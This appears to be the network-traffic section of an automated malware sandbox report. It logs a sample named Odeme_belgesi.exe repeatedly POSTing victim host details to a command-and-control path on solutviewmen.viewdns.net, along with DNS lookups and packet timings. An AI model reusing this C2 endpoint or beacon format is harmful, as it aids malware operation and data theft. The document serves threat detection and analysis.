              Oct 1, 2024 10:56:40.543445110 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:40.543639898 CEST4982180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:40.548365116 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.310524940 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.310563087 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.310663939 CEST4982180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.310714006 CEST4982180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.315505981 CEST804982145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.457863092 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.462841034 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.462941885 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.464965105 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.469813108 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:41.469899893 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:41.474718094 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.196302891 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.196382046 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.196430922 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.196459055 CEST4982280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.201278925 CEST804982245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.343494892 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.348530054 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.348648071 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.350737095 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.355602980 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:42.355680943 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:42.360491037 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.188508034 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.188554049 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.188728094 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.188899994 CEST4982380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.193662882 CEST804982345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.330215931 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.335081100 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.335253000 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.341423035 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.346295118 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:43.346923113 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:43.351775885 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.087699890 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.087728977 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.087856054 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.087949991 CEST4982480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.092775106 CEST804982445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.238311052 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.243158102 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.243228912 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.245318890 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.250159979 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.250216961 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.254991055 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.963037014 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.963192940 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:44.963211060 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.963388920 CEST4982580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:44.968018055 CEST804982545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.112330914 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.117228031 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.117403984 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.119550943 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.124363899 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.124435902 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.129246950 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.843538046 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.843573093 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.843693972 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.843728065 CEST4982680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.848546982 CEST804982645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.989365101 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.994198084 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:45.994307995 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:45.996553898 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.001847029 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.001924992 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.006688118 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.767757893 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.767875910 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.767885923 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.767959118 CEST4982780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.772732973 CEST804982745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.920260906 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.925290108 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.925380945 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.927398920 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.932241917 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:46.932311058 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:46.937129974 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.567887068 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.568003893 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.568144083 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.568144083 CEST4982880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.572926044 CEST804982845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.703016043 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.708062887 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.708184004 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.710268974 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.715066910 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:47.715173006 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:47.719971895 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.474303007 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.474333048 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.474447966 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.474613905 CEST4982980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.479547977 CEST804982945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.639234066 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.644165993 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.644253016 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.651488066 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.656292915 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:48.656357050 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:48.661314011 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.332030058 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.332051039 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.332109928 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.332151890 CEST4983080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.343833923 CEST804983045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.480952024 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.486859083 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.486955881 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.488979101 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.497201920 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:49.497277021 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:49.502142906 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.153675079 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.153697968 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.153801918 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.153883934 CEST4983180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.158653975 CEST804983145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.303663969 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.308577061 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.308671951 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.310678005 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.315412998 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.315483093 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.320280075 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.984432936 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.984467983 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:50.984560966 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.984560966 CEST4983280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:50.989481926 CEST804983245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.127923965 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.132833958 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.132921934 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.134881973 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.139684916 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.139744043 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.144855976 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.880937099 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.881052017 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.881073952 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:51.881123066 CEST4983380192.168.2.445.66.231.242
              Oct 1, 2024 10:56:51.885895967 CEST804983345.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.018949032 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.023880005 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.023979902 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.026005983 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.030776978 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.030834913 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.035727024 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.776621103 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.776638031 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.776756048 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.784621000 CEST4983480192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.789437056 CEST804983445.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.920841932 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.925955057 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.926045895 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.928201914 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.933007956 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:52.933069944 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:52.937911034 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.772931099 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.773027897 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.773057938 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.773080111 CEST4983580192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.777993917 CEST804983545.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.926585913 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.931476116 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.931587934 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.934497118 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.939332008 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:53.939405918 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:53.944281101 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.594682932 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.594753027 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.594825029 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.595424891 CEST4983680192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.603049994 CEST804983645.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.737349033 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.743048906 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.743160963 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.745157957 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.751154900 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:54.751235008 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:54.756027937 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.409951925 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.409990072 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.410094976 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.410146952 CEST4983780192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.414906025 CEST804983745.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.549855947 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.554817915 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.554932117 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.557056904 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.561853886 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:55.562072992 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:55.566962957 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.206754923 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.206787109 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.206844091 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.207001925 CEST4983880192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.211771011 CEST804983845.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.341849089 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.346730947 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.346828938 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.348913908 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.353913069 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:56.353976965 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:56.358797073 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.140919924 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.140942097 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.140958071 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.141031981 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.141153097 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.141153097 CEST4983980192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.145919085 CEST804983945.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.284576893 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.289500952 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.289592981 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.291670084 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.296540976 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.296632051 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.301481962 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.970891953 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.970988989 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.971039057 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:57.971086025 CEST4984080192.168.2.445.66.231.242
              Oct 1, 2024 10:56:57.976547956 CEST804984045.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.109875917 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.115355015 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.115446091 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.117475986 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.123116016 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.123183012 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.128233910 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.803797007 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.804022074 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.804541111 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:58.804594994 CEST4984180192.168.2.445.66.231.242
              Oct 1, 2024 10:56:58.809434891 CEST804984145.66.231.242192.168.2.4
              Oct 1, 2024 10:56:59.225980043 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:59.231942892 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:59.232115030 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:59.234206915 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:59.238960028 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:56:59.239027023 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:56:59.244564056 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.074596882 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.074697018 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.074827909 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.075083017 CEST4984280192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.079904079 CEST804984245.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.223882914 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.228730917 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.228832006 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.230870962 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.235863924 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:00.235929012 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:00.240870953 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.013664961 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.013789892 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.013791084 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.013830900 CEST4984380192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.018611908 CEST804984345.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.157294035 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.162226915 CEST804984445.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.162329912 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.164479017 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.169265032 CEST804984445.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.169312000 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.174132109 CEST804984445.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.960577011 CEST804984445.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.960664034 CEST804984445.66.231.242192.168.2.4
              Oct 1, 2024 10:57:01.960683107 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.960709095 CEST4984480192.168.2.445.66.231.242
              Oct 1, 2024 10:57:01.965569019 CEST804984445.66.231.242192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Oct 1, 2024 10:54:58.990483999 CEST5241653192.168.2.41.1.1.1
              Oct 1, 2024 10:54:59.000077009 CEST53524161.1.1.1192.168.2.4
              Oct 1, 2024 10:55:58.736445904 CEST5143153192.168.2.41.1.1.1
              Oct 1, 2024 10:55:58.747952938 CEST53514311.1.1.1192.168.2.4
              Oct 1, 2024 10:56:59.012109995 CEST5461353192.168.2.41.1.1.1
              Oct 1, 2024 10:56:59.225207090 CEST53546131.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 1, 2024 10:54:58.990483999 CEST192.168.2.41.1.1.10xea01Standard query (0)solutviewmen.viewdns.netA (IP address)IN (0x0001)false
              Oct 1, 2024 10:55:58.736445904 CEST192.168.2.41.1.1.10xddfcStandard query (0)solutviewmen.viewdns.netA (IP address)IN (0x0001)false
              Oct 1, 2024 10:56:59.012109995 CEST192.168.2.41.1.1.10x345eStandard query (0)solutviewmen.viewdns.netA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 1, 2024 10:54:59.000077009 CEST1.1.1.1192.168.2.40xea01No error (0)solutviewmen.viewdns.net45.66.231.242A (IP address)IN (0x0001)false
              Oct 1, 2024 10:55:58.747952938 CEST1.1.1.1192.168.2.40xddfcNo error (0)solutviewmen.viewdns.net45.66.231.242A (IP address)IN (0x0001)false
              Oct 1, 2024 10:56:59.225207090 CEST1.1.1.1192.168.2.40x345eNo error (0)solutviewmen.viewdns.net45.66.231.242A (IP address)IN (0x0001)false
              • solutviewmen.viewdns.net
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44973045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:54:59.012348890 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 176
              Connection: close
              Oct 1, 2024 10:54:59.017244101 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: 'ckav.rujones965969JONES-PCk0FDD42EE188E931437F4FBE2CzteoF
              Oct 1, 2024 10:54:59.840167046 CEST169INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:32 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.44973145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:00.007311106 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 176
              Connection: close
              Oct 1, 2024 10:55:00.012404919 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: 'ckav.rujones965969JONES-PC+0FDD42EE188E931437F4FBE2C9FzzC
              Oct 1, 2024 10:55:00.929594994 CEST169INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:33 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.44973245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:01.007904053 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:01.012877941 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:01.753258944 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:25:33 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.44973345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:01.924715042 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
